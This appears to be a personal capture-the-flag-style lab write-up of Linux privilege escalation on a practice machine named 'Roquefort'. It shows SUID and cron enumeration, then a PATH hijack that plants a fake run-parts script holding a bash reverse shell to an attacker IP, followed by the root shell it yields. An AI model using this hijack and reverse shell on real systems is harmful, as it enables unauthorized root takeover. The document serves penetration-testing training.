InfoSec LAB

Roquefort_Privilege_Escalation

Created: 3 min read

Writable PATH Variable

It has been identified that the current user, chloe, has write access to the SYSTEM’s PATH variable

chloe@roquefort:/$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

gitea is the only binary present in the /usr/local/bin/ directory

SUID

chloe@roquefort:/usr/local/bin$ find / -perm -04000 -ls -type f 2>/dev/null
   786528     32 -rwsr-xr-x   1 root     root        31720 Mar  7  2018 /bin/umount
   786477     32 -rwsr-xr-x   1 root     root        30800 Aug 21  2018 /bin/fusermount
   786624     60 -rwsr-xr-x   1 root     root        61240 Nov 10  2016 /bin/ping
   786527     44 -rwsr-xr-x   1 root     root        44304 Mar  7  2018 /bin/mount
   786525     40 -rwsr-xr-x   1 root     root        40536 May 17  2017 /bin/su
   265086     40 -rwsr-xr-x   1 root     root        40312 May 17  2017 /usr/bin/newgrp
   262222     40 -rwsr-xr-x   1 root     root        40504 May 17  2017 /usr/bin/chsh
   262224     76 -rwsr-xr-x   1 root     root        75792 May 17  2017 /usr/bin/gpasswd
   262221     52 -rwsr-xr-x   1 root     root        50040 May 17  2017 /usr/bin/chfn
   262225     60 -rwsr-xr-x   1 root     root        59680 May 17  2017 /usr/bin/passwd
   394506     12 -rwsr-xr-x   1 root     root        10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
   399975    432 -rwsr-xr-x   1 root     root       440728 Jul 15  2019 /usr/lib/openssh/ssh-keysign
   397132     44 -rwsr-xr--   1 root     messagebus    42992 Jun  9  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

It doesn’t appear that SUID binaries could be of any use with the writable PATH variable

Cron

chloe@roquefort:/usr/local/bin$ cat /etc/crontab | grep -v '^#'
 
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 
*/5 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

But there is a default cronjob running with an interval of 5 minutes. This could be leveraged. */5 * * * * root cd / && run-parts --report /etc/cron.hourly

run-parts

chloe@roquefort:/usr/local/bin$ which run-parts
/bin/run-parts

and the run-parts binary is fetched from the /bin/run-parts directory.

chloe@roquefort:/usr/local/bin$ echo 'bash -c "bash -i >& /dev/tcp/192.168.45.249/21 0>&1"' > run-parts

Placing an arbitrary run-parts script in the writable /usr/local/bin directory will take priority in the system’s execution order.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/roquefort/loot]
└─$ nnc 21
listening on [any] 21 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.206.67] 53696
bash: cannot set terminal process group (1437): Inappropriate ioctl for device
bash: no job control in this shell
root@roquefort:/# whoami
whoami
root
root@roquefort:/# hostname
hostname
roquefort
root@roquefort:/# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:5c:28 brd ff:ff:ff:ff:ff:ff
    inet 192.168.206.67/24 brd 192.168.206.255 scope global ens192
       valid_lft forever preferred_lft forever

System level compromise

Interactive Graph View

Backlinks